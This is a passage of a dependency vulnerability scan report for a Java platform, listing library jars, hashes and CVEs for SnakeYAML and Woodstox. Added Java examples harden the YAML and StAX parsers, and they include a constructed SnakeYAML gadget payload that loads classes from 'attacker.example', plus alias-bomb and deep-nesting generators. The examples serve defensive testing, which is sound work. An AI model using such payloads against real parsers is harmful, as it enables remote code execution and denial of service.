Mattmann Medium Vendor pom developer name Johann Sorel Medium Vendor pom developer name Martin Desruisseaux Medium Vendor pom developer name Rémi Maréchal Medium Vendor pom developer org Geomatys Medium Vendor pom developer org NASA Jet Propulsion Laboratory Medium Vendor pom developer org URL http://www.geomatys.com Medium Vendor pom developer org URL http://www.jpl.nasa.gov Medium Vendor pom groupid org.apache.sis.storage Highest Vendor pom name Apache SIS common storage High Vendor pom parent-artifactid storage Low Vendor pom parent-groupid org.apache.sis Medium Product file name sis-storage High Product jar package name apache Highest Product jar package name sis Highest Product jar package name storage Highest Product Manifest built-on 2017-11-10T19:36:30Z Low Product Manifest bundle-docurl http://sis.apache.org/storage/sis-storage Low Product Manifest Bundle-Name Apache SIS common storage Medium Product Manifest bundle-symbolicname org.apache.sis.storage Medium Product Manifest Implementation-Title Apache SIS common storage High Product Manifest implementation-url http://sis.apache.org/storage/sis-storage Low Product Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.7))" Low Product Manifest specification-title GeoAPI Medium Product pom artifactid sis-storage Highest Product pom developer email desruisseaux@apache.org Low Product pom developer email johann.sorel@geomatys.com Low Product pom developer email mattmann@apache.org Low Product pom developer email remi.marechal@geomatys.com Low Product pom developer id desruisseaux Low Product pom developer id jsorel Low Product pom developer id mattmann Low Product pom developer id rmarechal Low Product pom developer name Chris A. 
Mattmann Low Product pom developer name Johann Sorel Low Product pom developer name Martin Desruisseaux Low Product pom developer name Rémi Maréchal Low Product pom developer org Geomatys Low Product pom developer org NASA Jet Propulsion Laboratory Low Product pom developer org URL http://www.geomatys.com Low Product pom developer org URL http://www.jpl.nasa.gov Low Product pom groupid org.apache.sis.storage Highest Product pom name Apache SIS common storage High Product pom parent-artifactid storage Medium Product pom parent-groupid org.apache.sis Medium Version file version 0.8 High Version Manifest Implementation-Version 0.8 High Version pom version 0.8 Highest
sis-utility-0.8.jarDescription:
Miscellaneous utilities.
License:
https://www.apache.org/licenses/LICENSE-2.0.txt File Path: /var/simplicite/.m2/repository/org/apache/sis/core/sis-utility/0.8/sis-utility-0.8.jar
MD5: 10e3a9e45b8256c21eb143e7f6060474
SHA1: 4ad2d0805780c5a2cebc0dadbfb8307f94c91c4f
SHA256: add922cad9d64c14ff2098c8c599dcdad8f8593978ee94a68e2278aa0b0dff41
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name sis-utility High Vendor jar package name apache Highest Vendor jar package name sis Highest Vendor jar package name util Highest Vendor jar package name utilities Highest Vendor Manifest built-on 2017-11-10T19:36:30Z Low Vendor Manifest bundle-docurl http://sis.apache.org/core/sis-utility Low Vendor Manifest bundle-symbolicname org.apache.sis.util Medium Vendor Manifest implementation-url http://sis.apache.org/core/sis-utility Low Vendor Manifest Implementation-Vendor The Apache Software Foundation High Vendor Manifest Implementation-Vendor-Id org.apache.sis.core Medium Vendor Manifest require-capability osgi.extender;filter:="(osgi.extender=osgi.serviceloader.registrar)",osgi.serviceloader;cardinality:=multiple,osgi.extender;filter:="(osgi.extender=osgi.serviceloader.processor)",osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.7))" Low Vendor Manifest specification-vendor Open Geospatial Consortium Low Vendor Manifest spi-producer * Low Vendor pom artifactid sis-utility Highest Vendor pom artifactid sis-utility Low Vendor pom developer email desruisseaux@apache.org Low Vendor pom developer id desruisseaux Medium Vendor pom developer id jwhite Medium Vendor pom developer name Joseph F. 
White Medium Vendor pom developer name Martin Desruisseaux Medium Vendor pom developer org Geomatys Medium Vendor pom developer org URL http://www.geomatys.com Medium Vendor pom groupid org.apache.sis.core Highest Vendor pom name Apache SIS utilities High Vendor pom parent-artifactid core Low Vendor pom parent-groupid org.apache.sis Medium Product file name sis-utility High Product jar package name apache Highest Product jar package name geoapi Highest Product jar package name sis Highest Product jar package name util Highest Product jar package name utilities Highest Product jar package name version Highest Product Manifest built-on 2017-11-10T19:36:30Z Low Product Manifest bundle-docurl http://sis.apache.org/core/sis-utility Low Product Manifest Bundle-Name Apache SIS utilities Medium Product Manifest bundle-symbolicname org.apache.sis.util Medium Product Manifest Implementation-Title Apache SIS utilities High Product Manifest implementation-url http://sis.apache.org/core/sis-utility Low Product Manifest require-capability osgi.extender;filter:="(osgi.extender=osgi.serviceloader.registrar)",osgi.serviceloader;cardinality:=multiple,osgi.extender;filter:="(osgi.extender=osgi.serviceloader.processor)",osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.7))" Low Product Manifest specification-title GeoAPI Medium Product Manifest spi-producer * Low Product pom artifactid sis-utility Highest Product pom developer email desruisseaux@apache.org Low Product pom developer id desruisseaux Low Product pom developer id jwhite Low Product pom developer name Joseph F. 
White Low Product pom developer name Martin Desruisseaux Low Product pom developer org Geomatys Low Product pom developer org URL http://www.geomatys.com Low Product pom groupid org.apache.sis.core Highest Product pom name Apache SIS utilities High Product pom parent-artifactid core Medium Product pom parent-groupid org.apache.sis Medium Version file version 0.8 High Version Manifest Implementation-Version 0.8 High Version pom version 0.8 Highest
slf4j-api-1.7.30.jarDescription:
The slf4j API File Path: /var/simplicite/.m2/repository/org/slf4j/slf4j-api/1.7.30/slf4j-api-1.7.30.jar
MD5: f8be00da99bc4ab64c79ab1e2be7cb7c
SHA1: b5a4b6d16ab13e34a88fae84c35cd5d68cac922c
SHA256: cdba07964d1bb40a0761485c6b1e8c2f8fd9eb1d19c53928ac0d7f9510105c57
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name slf4j-api High Vendor jar package name slf4j Highest Vendor Manifest automatic-module-name org.slf4j Medium Vendor Manifest bundle-requiredexecutionenvironment J2SE-1.5 Low Vendor Manifest bundle-symbolicname slf4j.api Medium Vendor pom artifactid slf4j-api Highest Vendor pom artifactid slf4j-api Low Vendor pom groupid org.slf4j Highest Vendor pom name SLF4J API Module High Vendor pom parent-artifactid slf4j-parent Low Vendor pom url http://www.slf4j.org Highest Product file name slf4j-api High Product jar package name slf4j Highest Product Manifest automatic-module-name org.slf4j Medium Product Manifest Bundle-Name slf4j-api Medium Product Manifest bundle-requiredexecutionenvironment J2SE-1.5 Low Product Manifest bundle-symbolicname slf4j.api Medium Product Manifest Implementation-Title slf4j-api High Product pom artifactid slf4j-api Highest Product pom groupid org.slf4j Highest Product pom name SLF4J API Module High Product pom parent-artifactid slf4j-parent Medium Product pom url http://www.slf4j.org Medium Version file version 1.7.30 High Version Manifest Bundle-Version 1.7.30 High Version Manifest Implementation-Version 1.7.30 High Version pom version 1.7.30 Highest
slf4j-log4j12-1.7.30.jarDescription:
SLF4J LOG4J-12 Binding File Path: /var/simplicite/.m2/repository/org/slf4j/slf4j-log4j12/1.7.30/slf4j-log4j12-1.7.30.jar
MD5: 78f1ff83b38c52a30a278dec6e023a6d
SHA1: c21f55139d8141d2231214fb1feaf50a1edca95e
SHA256: 4d41e01c40caf8a6c74add2b073055d8a4ce1c30e58154177b13f12d78abbe7b
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name slf4j-log4j12 High Vendor jar package name log4j Highest Vendor jar package name slf4j Highest Vendor Manifest bundle-requiredexecutionenvironment J2SE-1.5 Low Vendor Manifest bundle-symbolicname slf4j.log4j12 Medium Vendor pom artifactid slf4j-log4j12 Highest Vendor pom artifactid slf4j-log4j12 Low Vendor pom groupid org.slf4j Highest Vendor pom name SLF4J LOG4J-12 Binding High Vendor pom parent-artifactid slf4j-parent Low Vendor pom url http://www.slf4j.org Highest Product file name slf4j-log4j12 High Product jar package name log4j Highest Product jar package name slf4j Highest Product Manifest Bundle-Name slf4j-log4j12 Medium Product Manifest bundle-requiredexecutionenvironment J2SE-1.5 Low Product Manifest bundle-symbolicname slf4j.log4j12 Medium Product Manifest Implementation-Title slf4j-log4j12 High Product pom artifactid slf4j-log4j12 Highest Product pom groupid org.slf4j Highest Product pom name SLF4J LOG4J-12 Binding High Product pom parent-artifactid slf4j-parent Medium Product pom url http://www.slf4j.org Medium Version file version 1.7.30 High Version Manifest Bundle-Version 1.7.30 High Version Manifest Implementation-Version 1.7.30 High Version pom version 1.7.30 Highest
snakeyaml-1.25.jarDescription:
YAML 1.1 parser and emitter for Java License:
Apache License, Version 2.0: http://www.apache.org/licenses/LICENSE-2.0.txt File Path: /var/simplicite/.m2/repository/org/yaml/snakeyaml/1.25/snakeyaml-1.25.jar
MD5: 6f7d5b8f596047aae07a3bf6f23a0bf2
SHA1: 8b6e01ef661d8378ae6dd7b511a7f2a33fae1421
SHA256: b50ef33187e7dc922b26dbe4dd0fdb3a9cf349e75a08b95269901548eee546eb
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name snakeyaml High Vendor jar package name emitter Highest Vendor jar package name parser Highest Vendor jar package name snakeyaml Highest Vendor jar package name yaml Highest Vendor Manifest automatic-module-name org.yaml.snakeyaml Medium Vendor Manifest bundle-symbolicname org.yaml.snakeyaml Medium Vendor Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.7))" Low Vendor pom artifactid snakeyaml Highest Vendor pom artifactid snakeyaml Low Vendor pom developer email alexander.maslov@gmail.com Low Vendor pom developer email jordanangold@gmail.com Low Vendor pom developer email public.somov@gmail.com Low Vendor pom developer id asomov Medium Vendor pom developer id Jordan Medium Vendor pom developer id maslovalex Medium Vendor pom developer name Alexander Maslov Medium Vendor pom developer name Andrey Somov Medium Vendor pom developer name Jordan Angold Medium Vendor pom groupid org.yaml Highest Vendor pom name SnakeYAML High Vendor pom url http://www.snakeyaml.org Highest Product file name snakeyaml High Product jar package name emitter Highest Product jar package name parser Highest Product jar package name snakeyaml Highest Product jar package name yaml Highest Product Manifest automatic-module-name org.yaml.snakeyaml Medium Product Manifest Bundle-Name SnakeYAML Medium Product Manifest bundle-symbolicname org.yaml.snakeyaml Medium Product Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.7))" Low Product pom artifactid snakeyaml Highest Product pom developer email alexander.maslov@gmail.com Low Product pom developer email jordanangold@gmail.com Low Product pom developer email public.somov@gmail.com Low Product pom developer id asomov Low Product pom developer id Jordan Low Product pom developer id maslovalex Low Product pom developer name Alexander Maslov Low Product pom developer name Andrey Somov Low Product pom developer name Jordan Angold Low Product pom 
groupid org.yaml Highest Product pom name SnakeYAML High Product pom url http://www.snakeyaml.org Medium Version file version 1.25 High Version pom version 1.25 Highest
CVE-2022-1471
SnakeYAML's Constructor() class does not restrict the types that can be instantiated during deserialization. Deserializing YAML content provided by an attacker can lead to remote code execution. We recommend using SnakeYAML's SafeConstructor when parsing untrusted content to restrict deserialization. We recommend upgrading to version 2.0 or later.
CWE-502 Deserialization of Untrusted Data
CVSSv3:
Base Score: CRITICAL (9.8) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H References:
Vulnerable Software & Versions:
CVE-2017-18640
The Alias feature in SnakeYAML before 1.26 allows entity expansion during a load operation, a related issue to CVE-2003-1564. CWE-776 Improper Restriction of Recursive Entity References in DTDs ('XML Entity Expansion')
CVSSv2:
Base Score: MEDIUM (5.0) Vector: /AV:N/AC:L/Au:N/C:N/I:N/A:P CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H References:
Vulnerable Software & Versions:
CVE-2022-25857
Versions of the package org.yaml:snakeyaml before 1.31 are vulnerable to Denial of Service (DoS) due to a missing nesting depth limitation for collections. CWE-776 Improper Restriction of Recursive Entity References in DTDs ('XML Entity Expansion')
CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H References:
Vulnerable Software & Versions:
CVE-2022-38749
Applications using SnakeYAML to parse untrusted YAML files may be vulnerable to Denial of Service (DoS) attacks. If the parser runs on user-supplied input, an attacker may supply content that makes the parser crash with a stack overflow. CWE-787 Out-of-bounds Write
CVSSv3:
Base Score: MEDIUM (6.5) Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H References:
Vulnerable Software & Versions:
CVE-2022-38751
Applications using SnakeYAML to parse untrusted YAML files may be vulnerable to Denial of Service (DoS) attacks. If the parser runs on user-supplied input, an attacker may supply content that makes the parser crash with a stack overflow. CWE-787 Out-of-bounds Write
CVSSv3:
Base Score: MEDIUM (6.5) Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H References:
Vulnerable Software & Versions:
CVE-2022-38752
Applications using SnakeYAML to parse untrusted YAML files may be vulnerable to Denial of Service (DoS) attacks. If the parser runs on user-supplied input, an attacker may supply content that makes the parser crash with a stack overflow. CWE-787 Out-of-bounds Write
CVSSv3:
Base Score: MEDIUM (6.5) Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H References:
Vulnerable Software & Versions:
CVE-2022-41854
Applications using SnakeYAML to parse untrusted YAML files may be vulnerable to Denial of Service (DoS) attacks. If the parser runs on user-supplied input, an attacker may supply content that makes the parser crash with a stack overflow. This effect may support a denial of service attack. CWE-787 Out-of-bounds Write
CVSSv3:
Base Score: MEDIUM (6.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H References:
Vulnerable Software & Versions:
CVE-2022-38750
Applications using SnakeYAML to parse untrusted YAML files may be vulnerable to Denial of Service (DoS) attacks. If the parser runs on user-supplied input, an attacker may supply content that makes the parser crash with a stack overflow. CWE-787 Out-of-bounds Write
CVSSv3:
Base Score: MEDIUM (5.5) Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H References:
Vulnerable Software & Versions:
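The seven SnakeYAML findings above fall into two groups: CVE-2022-1471 (arbitrary class instantiation through global `!!` tags) and the alias-expansion, nesting-depth and stack-overflow denial-of-service CVEs. Both groups are closed in the same place, the loader configuration. The class below is an added example, not code from the Simplicite platform or the SnakeYAML project. It is written against the SnakeYAML 2.x API that the CVE-2022-1471 advisory recommends upgrading to: `SafeConstructor(LoaderOptions)` replaces the no-argument constructors available in 1.25, and the `LoaderOptions` limits used here only exist from 1.32 onward (in 2.x even the plain `Constructor` rejects global tags by default, but `SafeConstructor` remains the right choice for data that is never meant to become application objects). The limit values and the sample documents are constructed for the demonstration; size the limits for the documents your application actually accepts. Requires Java 11 or later for `String.repeat`.

```java
import org.yaml.snakeyaml.LoaderOptions;
import org.yaml.snakeyaml.Yaml;
import org.yaml.snakeyaml.constructor.SafeConstructor;
import org.yaml.snakeyaml.error.YAMLException;

/** Added example (not Simplicite or SnakeYAML project code): a loader for untrusted YAML on SnakeYAML 2.x. */
public final class UntrustedYamlLoader {

    /**
     * SafeConstructor only builds standard YAML types (maps, lists, scalars) and refuses every
     * global tag such as !!javax.script.ScriptEngineManager (the CVE-2022-1471 class). The
     * LoaderOptions limits bound alias expansion (CVE-2017-18640) and nesting depth
     * (CVE-2022-25857 and the stack-overflow CVEs). Yaml instances are not thread-safe, so one is built per call.
     */
    public static Yaml untrustedLoader() {
        LoaderOptions opts = new LoaderOptions();
        opts.setMaxAliasesForCollections(50);   // aliases to non-scalar nodes allowed per document (assumed value)
        opts.setNestingDepthLimit(50);          // collections nested deeper than this are rejected (assumed value)
        opts.setCodePointLimit(1024 * 1024);    // 1 MiB input cap (assumed value)
        opts.setAllowRecursiveKeys(false);      // recursive keys are never needed for configuration data
        return new Yaml(new SafeConstructor(opts));
    }

    /** Parse one document; throws YAMLException for anything the constructor or the limits reject. */
    public static Object load(String document) {
        return untrustedLoader().load(document);
    }

    // Constructed sample documents for the demonstration.

    /** The shape of document that made the 1.x default Constructor instantiate a JDK class. */
    static final String GADGET_DOC =
        "!!javax.script.ScriptEngineManager [\n"
      + "  !!java.net.URLClassLoader [[ !!java.net.URL [\"http://attacker.example/\"] ]]\n"
      + "]\n";

    /** A "billion laughs" style document: each level aliases the previous collection ten times. */
    static String aliasBomb(int levels) {
        StringBuilder sb = new StringBuilder("a: &a [\"lol\", \"lol\", \"lol\"]\n");
        char prev = 'a';
        for (int i = 1; i <= levels; i++) {
            char cur = (char) ('a' + i);
            sb.append(cur).append(": &").append(cur).append(" [");
            for (int j = 0; j < 10; j++) {
                sb.append(j == 0 ? "" : ", ").append('*').append(prev);
            }
            sb.append("]\n");
            prev = cur;
        }
        return sb.toString();
    }

    /** A flow sequence nested `depth` levels deep, the input class behind the stack-overflow CVEs. */
    static String deepNesting(int depth) {
        return "[".repeat(depth) + "]".repeat(depth);
    }

    static void tryLoad(String label, String document) {
        try {
            Object result = load(document);
            System.out.println(label + ": loaded " + (result == null ? "null" : result.getClass().getSimpleName()));
        } catch (YAMLException e) {
            // ComposerException (tag refused) and plain YAMLException (limit exceeded) both extend YAMLException
            System.out.println(label + ": rejected (" + e.getClass().getSimpleName() + ": " + e.getMessage().split("\n")[0] + ")");
        }
    }

    public static void main(String[] args) {
        tryLoad("benign config", "server:\n  port: 8080\n  hosts: [a, b]\n");
        tryLoad("gadget tag", GADGET_DOC);             // global tag, refused before any class is looked up
        tryLoad("alias bomb", aliasBomb(6));           // 60 aliases to collections, above the limit of 50
        tryLoad("deep nesting", deepNesting(10_000));  // far deeper than the limit of 50
    }
}
```

The benign document loads as a map; the other three are rejected with a `YAMLException` before any class is instantiated or any unbounded recursion happens. Note that `load` still returns whatever tree the document describes, so the caller must validate the shape of the result before using it.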
stax-ex-1.8.1.jarDescription:
Extensions to JSR-173 StAX API. License:
Eclipse Distribution License - v 1.0: http://www.eclipse.org/org/documents/edl-v10.php File Path: /var/simplicite/.m2/repository/org/jvnet/staxex/stax-ex/1.8.1/stax-ex-1.8.1.jar
MD5: 8fea4418fa80e957e39c174cec08053c
SHA1: 78011e483a21102fb4858f3e8f269a677e50aa23
SHA256: 20522549056e9e50aa35ef0b445a2e47a53d06be0b0a9467d704e2483ffb049a
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name stax-ex High Vendor jar package name jvnet Highest Vendor jar package name staxex Highest Vendor Manifest bundle-docurl https://www.eclipse.org Low Vendor Manifest bundle-symbolicname org.jvnet.staxex.stax-ex Medium Vendor Manifest implementation-build-id 1.8.1-acf3f94, 2018-12-27T15:12:49+0000 Low Vendor Manifest implementation-url https://projects.eclipse.org/projects/ee4j/stax-ex Low Vendor Manifest Implementation-Vendor Eclipse Foundation High Vendor Manifest Implementation-Vendor-Id org.jvnet.staxex Medium Vendor pom artifactid stax-ex Highest Vendor pom artifactid stax-ex Low Vendor pom developer email Roman.Grigoriadi@oracle.com Low Vendor pom developer email Zheng.Jun.Li@oracle.com Low Vendor pom developer id bravehorsie Medium Vendor pom developer id zhengjl Medium Vendor pom developer name Roman Grigoriadi Medium Vendor pom developer name Zheng Jun Li Medium Vendor pom groupid org.jvnet.staxex Highest Vendor pom name Extended StAX API High Vendor pom parent-artifactid project Low Vendor pom parent-groupid org.eclipse.ee4j Medium Product file name stax-ex High Product jar package name jvnet Highest Product jar package name staxex Highest Product Manifest bundle-docurl https://www.eclipse.org Low Product Manifest Bundle-Name Extended StAX API Medium Product Manifest bundle-symbolicname org.jvnet.staxex.stax-ex Medium Product Manifest implementation-build-id 1.8.1-acf3f94, 2018-12-27T15:12:49+0000 Low Product Manifest Implementation-Title Extended StAX API High Product Manifest implementation-url https://projects.eclipse.org/projects/ee4j/stax-ex Low Product pom artifactid stax-ex Highest Product pom developer email Roman.Grigoriadi@oracle.com Low Product pom developer email Zheng.Jun.Li@oracle.com Low Product pom developer id bravehorsie Low Product pom developer id zhengjl Low Product pom developer name Roman Grigoriadi Low Product pom developer name Zheng Jun Li Low Product pom groupid 
org.jvnet.staxex Highest Product pom name Extended StAX API High Product pom parent-artifactid project Medium Product pom parent-groupid org.eclipse.ee4j Medium Version file version 1.8.1 High Version Manifest Bundle-Version 1.8.1 High Version Manifest Implementation-Version 1.8.1 High Version pom parent-version 1.8.1 Low Version pom version 1.8.1 Highest
stax2-api-4.2.jarDescription:
Stax2 API is an extension to the basic Stax 1.0 API that adds significant new functionality, such as a full-featured bi-directional validation interface and a high-performance Typed Access API.
License:
The BSD License: http://www.opensource.org/licenses/bsd-license.php File Path: /var/simplicite/.m2/repository/org/codehaus/woodstox/stax2-api/4.2/stax2-api-4.2.jar
MD5: 5d22fe6dbb276d1fd6dab40c386a4f0a
SHA1: 13c2b30926bca0429c704c4b4ca0b5d0432b69cd
SHA256: badf6081a0bb526fd2c01951dfefad91b6846b6dd0eb0048587e30d1dd334e68
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name stax2-api High Vendor jar package name codehaus Highest Vendor jar package name stax2 Highest Vendor jar package name typed Highest Vendor jar package name validation Highest Vendor Manifest automatic-module-name org.codehaus.stax2 Medium Vendor Manifest bundle-docurl http://github.com/FasterXML/stax2-api Low Vendor Manifest bundle-symbolicname stax2-api Medium Vendor Manifest implementation-build-date 2019-03-13 04:03:16+0000 Low Vendor Manifest Implementation-Vendor fasterxml.com High Vendor Manifest Implementation-Vendor-Id org.codehaus.woodstox Medium Vendor Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.6))" Low Vendor Manifest specification-vendor fasterxml.com Low Vendor pom artifactid stax2-api Highest Vendor pom artifactid stax2-api Low Vendor pom developer email tatu@fasterxml.com Low Vendor pom developer id tatu Medium Vendor pom developer name Tatu Saloranta Medium Vendor pom groupid org.codehaus.woodstox Highest Vendor pom name Stax2 API High Vendor pom organization name fasterxml.com High Vendor pom organization url http://fasterxml.com Medium Vendor pom parent-artifactid oss-parent Low Vendor pom parent-groupid com.fasterxml Medium Vendor pom url http://github.com/FasterXML/stax2-api Highest Product file name stax2-api High Product jar package name codehaus Highest Product jar package name osgi Highest Product jar package name stax2 Highest Product jar package name typed Highest Product jar package name validation Highest Product Manifest automatic-module-name org.codehaus.stax2 Medium Product Manifest bundle-docurl http://github.com/FasterXML/stax2-api Low Product Manifest Bundle-Name Stax2 API Medium Product Manifest bundle-symbolicname stax2-api Medium Product Manifest implementation-build-date 2019-03-13 04:03:16+0000 Low Product Manifest Implementation-Title Stax2 API High Product Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.6))" 
Low Product Manifest specification-title Stax2 API Medium Product pom artifactid stax2-api Highest Product pom developer email tatu@fasterxml.com Low Product pom developer id tatu Low Product pom developer name Tatu Saloranta Low Product pom groupid org.codehaus.woodstox Highest Product pom name Stax2 API High Product pom organization name fasterxml.com Low Product pom organization url http://fasterxml.com Low Product pom parent-artifactid oss-parent Medium Product pom parent-groupid com.fasterxml Medium Product pom url http://github.com/FasterXML/stax2-api Medium Version file version 4.2 High Version Manifest Implementation-Version 4.2 High Version pom parent-version 4.2 Low Version pom version 4.2 Highest
CVE-2022-40152
Applications using Woodstox to parse XML data may be vulnerable to Denial of Service (DoS) attacks if DTD support is enabled. If the parser runs on user-supplied input, an attacker may supply content that makes the parser crash with a stack overflow. This effect may support a denial of service attack. CWE-787 Out-of-bounds Write
CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H References:
Vulnerable Software & Versions:
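CVE-2022-40152 only applies when the StAX parser processes DTDs, so the practical check is whether the application's `XMLInputFactory` has DTD support switched off, which also removes entity expansion and external-entity (XXE) exposure. The class below is an added example, not code from the Simplicite platform or the Woodstox project. stax2-api is the API jar flagged above; the parsing code the CVE describes lives in the Woodstox implementation, and the example uses only the standard `javax.xml.stream` API, so it applies to whichever implementation `XMLInputFactory.newFactory()` selects on the classpath (Woodstox when woodstox-core is present, otherwise the JDK's built-in parser). The two XML documents are constructed for the demonstration.

```java
import javax.xml.stream.XMLInputFactory;
import javax.xml.stream.XMLStreamConstants;
import javax.xml.stream.XMLStreamException;
import javax.xml.stream.XMLStreamReader;

import java.io.StringReader;

/** Added example (not Simplicite or Woodstox project code): a StAX factory with DTD processing left on versus switched off. */
public final class StaxDtdHardening {

    /** The weak setting: XMLInputFactory defaults to SUPPORT_DTD=true, so DOCTYPE subsets are parsed and entities expanded. */
    public static XMLInputFactory defaultFactory() {
        return XMLInputFactory.newFactory();
    }

    /** The corrected setting: no DOCTYPE processing and no external entities, whichever implementation is on the classpath. */
    public static XMLInputFactory hardenedFactory() {
        XMLInputFactory f = XMLInputFactory.newFactory();
        f.setProperty(XMLInputFactory.SUPPORT_DTD, false);                      // the DTD subset is skipped, not parsed
        f.setProperty(XMLInputFactory.IS_SUPPORTING_EXTERNAL_ENTITIES, false); // never fetch SYSTEM/PUBLIC entities
        return f;
    }

    /**
     * Text content of the root element, or null when the parser refuses the document.
     * With DTD support off the DOCTYPE subset is never parsed, so a reference to an entity
     * declared there is a reference to an undeclared entity and the reader throws.
     */
    public static String rootText(XMLInputFactory factory, String xml) {
        try {
            XMLStreamReader r = factory.createXMLStreamReader(new StringReader(xml));
            int event = r.next();
            while (event != XMLStreamConstants.START_ELEMENT) {  // skip DTD and whitespace events before the root
                event = r.next();
            }
            String text = r.getElementText();
            r.close();
            return text;
        } catch (XMLStreamException e) {
            return null;
        }
    }

    // Constructed sample documents.
    static final String PLAIN = "<note>hello</note>";
    static final String WITH_DTD =
        "<?xml version=\"1.0\"?>\n"
      + "<!DOCTYPE note [ <!ENTITY e \"expanded\"> ]>\n"
      + "<note>&e;</note>";

    public static void main(String[] args) {
        System.out.println("default, plain     : " + rootText(defaultFactory(), PLAIN));
        System.out.println("default, with DTD  : " + rootText(defaultFactory(), WITH_DTD));
        System.out.println("hardened, plain    : " + rootText(hardenedFactory(), PLAIN));
        System.out.println("hardened, with DTD : " + rootText(hardenedFactory(), WITH_DTD));
    }
}
```

With the default factory the second document yields the expanded entity text; with the hardened factory the plain document still parses and the DTD-bearing one is refused, which is the behaviour to confirm in a unit test before treating this CVE as mitigated rather than merely upgraded around.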
stringtemplate-3.2.1.jarDescription:
StringTemplate is a java template engine for generating source code,
web pages, emails, or any other formatted text output.
StringTemplate is particularly good at multi-targeted code generators,
multiple site skins, and internationalization/localization.
It evolved over years of effort developing jGuru.com.
StringTemplate also generates the stringtemplate website: http://www.stringtemplate.org
and powers the ANTLR v3 code generator. Its distinguishing characteristic
is that unlike other engines, it strictly enforces model-view separation.
Strict separation makes websites and code generators more flexible
and maintainable; it also provides an excellent defense against malicious
template authors.
There are currently about 600 StringTemplate source downloads a month.
License:
BSD licence: http://antlr.org/license.html File Path: /var/simplicite/.m2/repository/org/antlr/stringtemplate/3.2.1/stringtemplate-3.2.1.jar
MD5: b58ca53e518a92a1991eb63b61917582
SHA1: 59ec8083721eae215c6f3caee944c410d2be34de
SHA256: f66ce72e965e5301cb0f020e54d2ba6ad76feb91b3cbfc30dbbf00c06a6df6d7
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name stringtemplate High Vendor jar package name antlr Highest Vendor jar package name antlr Low Vendor jar package name language Low Vendor jar package name stringtemplate Highest Vendor jar package name stringtemplate Low Vendor pom artifactid stringtemplate Highest Vendor pom artifactid stringtemplate Low Vendor pom developer email jimi@temporal-wave.com Low Vendor pom developer email parrt@antlr.org Low Vendor pom developer name Jim Idle Medium Vendor pom developer name Terence Parr Medium Vendor pom developer org Temporal Wave LLC Medium Vendor pom developer org USFCA Medium Vendor pom developer org URL http://www.cs.usfca.edu Medium Vendor pom developer org URL http://www.temporal-wave.com Medium Vendor pom groupid org.antlr Highest Vendor pom name ANTLR StringTemplate High Vendor pom url http://www.stringtemplate.org Highest Product file name stringtemplate High Product jar package name antlr Highest Product jar package name language Low Product jar package name stringtemplate Highest Product jar package name stringtemplate Low Product pom artifactid stringtemplate Highest Product pom developer email jimi@temporal-wave.com Low Product pom developer email parrt@antlr.org Low Product pom developer name Jim Idle Low Product pom developer name Terence Parr Low Product pom developer org Temporal Wave LLC Low Product pom developer org USFCA Low Product pom developer org URL http://www.cs.usfca.edu Low Product pom developer org URL http://www.temporal-wave.com Low Product pom groupid org.antlr Highest Product pom name ANTLR StringTemplate High Product pom url http://www.stringtemplate.org Medium Version file version 3.2.1 High Version pom version 3.2.1 Highest
stripe-java-12.0.0.jarDescription:
Stripe Java Bindings License:
The MIT License: https://opensource.org/licenses/MIT File Path: /var/simplicite/.m2/repository/com/stripe/stripe-java/12.0.0/stripe-java-12.0.0.jar
MD5: 78c7e3844db994a92b3737de088c720c
SHA1: 126bbc011f3a25472d7180db10f8e24ce8bd9e91
SHA256: ec7353106e0533db0bc52ab7bb9a4cd77e3647765847c6fe97859b9ebc6e2f40
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name stripe-java High Vendor jar package name stripe Highest Vendor Manifest bundle-symbolicname stripe-java Medium Vendor Manifest Implementation-Vendor Stripe, Inc. (https://stripe.com) High Vendor Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.8))" Low Vendor pom artifactid stripe-java Highest Vendor pom artifactid stripe-java Low Vendor pom developer email support+java@stripe.com Low Vendor pom developer id stripe Medium Vendor pom developer name Stripe Medium Vendor pom groupid com.stripe Highest Vendor pom name stripe-java High Vendor pom organization name Stripe High Vendor pom organization url https://stripe.com Medium Vendor pom url stripe/stripe-java Highest Product file name stripe-java High Product jar package name stripe Highest Product Manifest Bundle-Name stripe-java Medium Product Manifest bundle-symbolicname stripe-java Medium Product Manifest Implementation-Title stripe-java High Product Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.8))" Low Product pom artifactid stripe-java Highest Product pom developer email support+java@stripe.com Low Product pom developer id stripe Low Product pom developer name Stripe Low Product pom groupid com.stripe Highest 